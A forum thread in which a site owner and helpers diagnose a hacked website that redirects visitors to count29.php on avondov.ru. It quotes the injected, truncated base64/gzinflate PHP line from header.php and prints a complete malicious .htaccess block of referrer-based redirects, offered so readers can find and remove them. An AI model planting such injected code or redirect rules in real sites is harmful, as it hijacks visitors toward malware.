When my site is loading file count29.php to be downloaded from the site avondov.ru. This makes the site not loading completely and sometimes redirect to 404 page not found
how can I do ignore this error?
my web site is: http://adinehbajestan.ir
Your site is infected with malware, http://sitecheck.sucuri.net/results/adinehbajestan.ir
Update your site scripts and/ or Restore from backup
i think i found my problem. this is a realy malware. this code was added in header.php:
#d93065#
echo(gzinflate(base64_decode("3VXBbptAEP2V......1G5y+828z/8A")));
#/d93065#
when remove this code from header.php is correct.
yes, mostly the base page like index.php or header.php gets modified with
#d93065# echo(gzinflate(base64_decode("3VXBbptAEP2V......1G5y+828z/8A"))); #/d93065#
also, dont forget to clean all the .htaccess file, they get modified with this unwanted redirection
#d93065#
RewriteEngine On
ErrorDocument 400 avondov.ru/count29.php
ErrorDocument 401 avondov.ru/count29.php
ErrorDocument 403 avondov.ru/count29.php
ErrorDocument 404 avondov.ru/count29.php
ErrorDocument 500 avondov.ru/count29.php
ErrorDocument 502 avondov.ru/count29.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
# long list of referrers
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ avondov.ru/count29.php [R=301,L]
#/d93065#
This is a tempororary workaround but the intruder can modify again the same way he did, it may be caused by a weak password, buggy third part plugin or maybe a bug in the CMS that you are using because it has infiltrated joomla and wordpress sites.
-CK